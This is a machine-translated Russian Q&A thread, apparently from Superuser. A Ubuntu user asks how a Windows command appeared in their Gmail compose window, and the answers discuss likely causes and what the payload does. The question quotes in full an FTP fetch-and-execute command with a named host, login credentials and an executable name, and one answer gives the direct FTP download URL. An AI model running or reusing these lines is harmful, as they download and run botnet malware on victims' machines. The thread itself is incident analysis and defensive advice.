Как определить, был ли взломан мой Linux-компьютер?

128

Мой домашний компьютер обычно включен, но монитор выключен. Этим вечером я пришел домой с работы и обнаружил, что выглядит как попытка взлома: в моем браузере был открыт мой Gmail (это был я), но он находился в режиме составления со следующим в TOполе:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo

Для меня это выглядит как код командной строки Windows, а mdзапуск кода в сочетании с тем фактом, что Gmail находился в режиме создания, делает очевидным, что кто-то пытался выполнить cmdкоманду. Думаю, мне повезло, что я не запускаю Windows на этом ПК, но у меня есть другие, которые делают это. Это первый раз, когда подобное случается со мной. Я не гуру Linux, и в то время я не запускал никаких других программ, кроме Firefox.

Я абсолютно уверен, что я не написал это, и никто другой не был физически за моим компьютером. Кроме того, я недавно изменил свой пароль Google (и все остальные мои пароли) на что-то вроде этого, vMA8ogd7bvпоэтому я не думаю, что кто-то взломал мою учетную запись Google.

Что сейчас произошло? Как кто-то нажимает клавиши на моем компьютере, если это не старая машина Windows, на которой работает бабушка, годами запускающая вредоносное ПО, а недавно установленная новая версия Ubuntu?

Обновление:
позвольте мне обратиться к некоторым пунктам и вопросам:

  • Я в Австрии, в деревне. Мой маршрутизатор WLAN использует WPA2 / PSK и пароль средней надежности, которого нет в словаре; должен был быть грубым и менее чем в 50 метрах отсюда; маловероятно, что его взломали.
  • Я использую проводную клавиатуру USB, так что очень маловероятно, что кто-то может быть в пределах досягаемости, чтобы взломать ее.
  • Я не использовал свой компьютер в то время; это было просто бездельничать дома, пока я был на работе. Это установленный на мониторе неттоп ПК, поэтому я редко его выключаю.
  • Машине всего два месяца, работает только Ubuntu, и я не использую странные программы и не посещаю странные сайты. В основном это Stack Exchange, Gmail и газеты. Нет игр. Ubuntu настроен на то, чтобы обновляться.
  • Я не знаю ни одного работающего сервиса VNC; Я, конечно, не установил или не включил один. Я также не запускал никаких других серверов. Я не уверен, если какие-либо из них работают в Ubuntu по умолчанию?
  • Я знаю все IP-адреса в учетной записи Gmail. Я уверен, что Google не был прихожей.
  • Я нашел средство просмотра файлов журнала , но не знаю, что искать. Помогите?

Что я действительно хочу знать, так это то, что заставляет меня чувствовать себя небезопасно, так это то, как кто-то из Интернета может нажимать клавиши на моей машине? Как я могу предотвратить это, не думая об этом? Я не фанат Linux, я отец, который уже более 20 лет работает с Windows и устал от этого. И за все 18 с лишним лет пребывания в сети я никогда лично не видел попыток взлома, так что для меня это ново.

Торбен Гундтофте-Бруун
источник
4
Кто-нибудь еще имел доступ к вашему компьютеру, или у вас очень старая беспроводная клавиатура? Также в Ubuntu есть встроенный VNC-сервер. Если это активно, случайный скрипт где-то мог подключиться и предполагать, что это был компьютер под управлением Windows, посылая нажатия клавиш WIN + R, cmd ......
TuxRug
29
@torbengb: Твой пост действительно пугает меня ...
Mehrdad
9
Есть ли другие компьютеры в вашей беспроводной сети? Если злоумышленник нарушит их безопасность, это даст ему «вход» в вашу локальную сеть, что может привести к взлому коробки Ubuntu различными способами.
CarlF
4
@muntoo ... и я уверен, что вы нигде не записали это и не используете приложение для управления ими, верно? Давайте не будем начинать взламывать пароли; по крайней мере, мой пароль не password:-)
Торбен Гундтофте-Брюн
6
У тебя есть кот?
Заки

Ответы:

66

Я сомневаюсь, что тебе есть о чем беспокоиться. Скорее всего, это была атака JavaScript, которая пыталась сделать диск загрузкой . Если вас это беспокоит, начните использовать дополнения NoScript и AdBlock Plus Firefox.

Даже посещая надежные сайты, вы не защищены, потому что они запускают код JavaScript от сторонних рекламодателей, который может быть вредоносным.

Я схватил его и запустил в ВМ. Он установил mirc и это журнал состояния ... http://pastebin.com/Mn85akMk

Это автоматическая атака, которая пытается заставить вас загрузить mIRC и присоединиться к ботнету, который превратит вас в спамбота ... Он подключил мою виртуальную машину и установил соединение с несколькими различными удаленными адресами, один из которых является autoemail-119.west320.com.

При запуске в Windows 7 мне пришлось принять приглашение UAC и разрешить доступ через брандмауэр.

Кажется, на других форумах есть тонны сообщений об этой точной команде, и кто-то даже говорит, что торрент-файл пытался выполнить его после завершения загрузки ... Хотя я не уверен, как это возможно.

Я не использовал это сам, но он должен быть в состоянии показать вам текущие сетевые подключения, чтобы вы могли увидеть, если вы подключены к чему-то вне нормы: http://netactview.sourceforge.net/download.html

Riguez
источник
10
Э-э, почему были удалены все комментарии (даже очень важные , которые обнаружили, что скрипт пытался открыть cmdокно) ?
BlueRaja - Дэнни Пфлугхофт
Буду ли я так же защищен от такого рода атак, если только начну использовать uBlock Origin?
RobotUnderscore
42

Я согласен с @ jb48394, что это, вероятно, эксплойт JavaScript, как и все остальное в наши дни.

Тот факт, что он пытался открыть cmdокно (см . Комментарий @ torbengb ) и запустить вредоносную команду, а не просто незаметно загружать троян в фоновом режиме, предполагает, что он использует некоторую уязвимость в Firefox, которая позволяет ему вводить нажатия клавиш, но не запускать код.

Это также объясняет , почему этот подвиг, который был явно написан исключительно для Windows, также будет работать в Linux: Firefox работает код JavaScript , так же , как во всех OS'es (по крайней мере, он пытается :)) . Если бы это было вызвано переполнением буфера или подобным эксплойтом, предназначенным для Windows, это просто привело бы к сбою программы.

Что касается того, откуда появился код JavaScript - вероятно, вредоносная реклама Google (рекламный цикл в Gmail в течение дня) . Это не было бы первое время .

BlueRaja - Дэнни Пфлугхофт
источник
4
Хорошие ссылки.
kizzx2
9
К вашему сведению для скиммеров, эта последняя «ссылка» на самом деле пять отдельных ссылок.
всплывает
Было бы весьма шокирующим, если это действительно эксплойт Javascript, так как мой Firefox обычно остается открытым в течение нескольких дней. Однако вам нужно вызвать специальный API для отправки ключей в другую систему в Windows и, возможно, в другой системный вызов (если существует) в Linux. Поскольку отправка нажатий клавиш не является нормальной операцией Javascript, я сомневаюсь, что Firefox осуществит кросс-платформенный вызов для этого.
billc.cn
1
@ billc.cn: Я считаю, что запись в буфер клавиатуры PS / 2 работает одинаково независимо от операционной системы .
BlueRaja - Дэнни Пфлюгофт
12

Я обнаружил похожую атаку на другой Linux-машине. Кажется, это какая-то команда FTP для Windows.

Шекхар
источник
8
Точнее, он загружает и запускает файл ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exeс помощью ftpинструмента командной строки Windows .
Гравитация
нашел его на pastebin тоже pastebin.com/FXwRpKH4
Шехар
Вот информация о сайте whois.domaintools.com/216.210.179.67
Шехар
9
Это пакет WinRAR SFX, содержащий переносную установку mIRC и файл с именем «DriverUpdate.exe». DriverUpdate.exe выполняет (как минимум) две команды оболочки: netsh firewall set opmode set disable и killkill / F / IM VCSPAWN.EXE / T Он также пытается (я думаю) добавить die-freesms-seite.com в доверенную зону Internet Explorer и обход прокси.
Эндрю Ламберт
5

Это не отвечает на весь ваш вопрос, но в файле журнала ищите неудачные попытки входа.

Если в вашем журнале более пяти неудачных попыток, кто-то попытался взломать root. Если есть успешная попытка войти в систему, rootкогда вы были вдали от компьютера, ИЗМЕНИТЕ СВОЙ ПАРОЛЬ НЕМЕДЛЕННО !! Я имею в виду прямо сейчас! Желательно что-то буквенно-цифровое, длиной около 10 символов.

С сообщениями, которые вы получили ( echoкоманды), это действительно звучит как какой-то незрелый сценарий, детка . Если бы это был настоящий хакер, который знает, что он делает, вы, вероятно, все равно не узнали бы об этом.

Нейт Коппенхейвер
источник
2
Я согласен, что это было очевидно очень любительским. По крайней мере, они не должны были ставить эхо, которым ты владел в конце. Заставляет меня задуматься о том, прошел ли когда-нибудь "настоящий хакер"? Или, может быть, я спрашиваю, сколько?
Торбен Гундтофте-Брюн
1
@torgengb: если бы команда была запущена в командной строке Windows, вы бы не увидели эхо (из-за &exit)
BlueRaja - Дэнни Пфлугхофт
-1

whois Сообщает, что west320.com принадлежит Microsoft.

UPnP и Vino (Система -> Настройки -> Удаленный рабочий стол) в сочетании со слабым паролем Ubuntu?

Вы использовали нестандартные репозитории?

DEF CON проводит соревнования по Wi-Fi каждый год в отношении того, как далеко можно добраться до точки доступа Wi-Fi - в последний раз я слышал, что это 250 миль.

Если вы действительно хотите испугаться, посмотрите на скриншоты центра командного управления ботнетом Zeus . Ни одна машина не является безопасной, но Firefox в Linux безопаснее остальных. Еще лучше, если вы запустите SELinux .

RJT
источник
1
Автор этого эксплойта явно не собирался запускать это на Linux, поэтому я сомневаюсь, что это имеет какое-либо отношение к уязвимой утилите gnome или слабому паролю (также OP уже упоминал, что у него есть безопасный пароль)
BlueRaja - Danny Pflughoeft
На самом деле, он не упоминает наличие пароля Ubuntu, только пароль Gmail и беспроводной пароль. Ребенок, работающий с metasploit, может даже не знать о Linux, он просто видит VNC. Скорее всего, это атака javascript.
RJT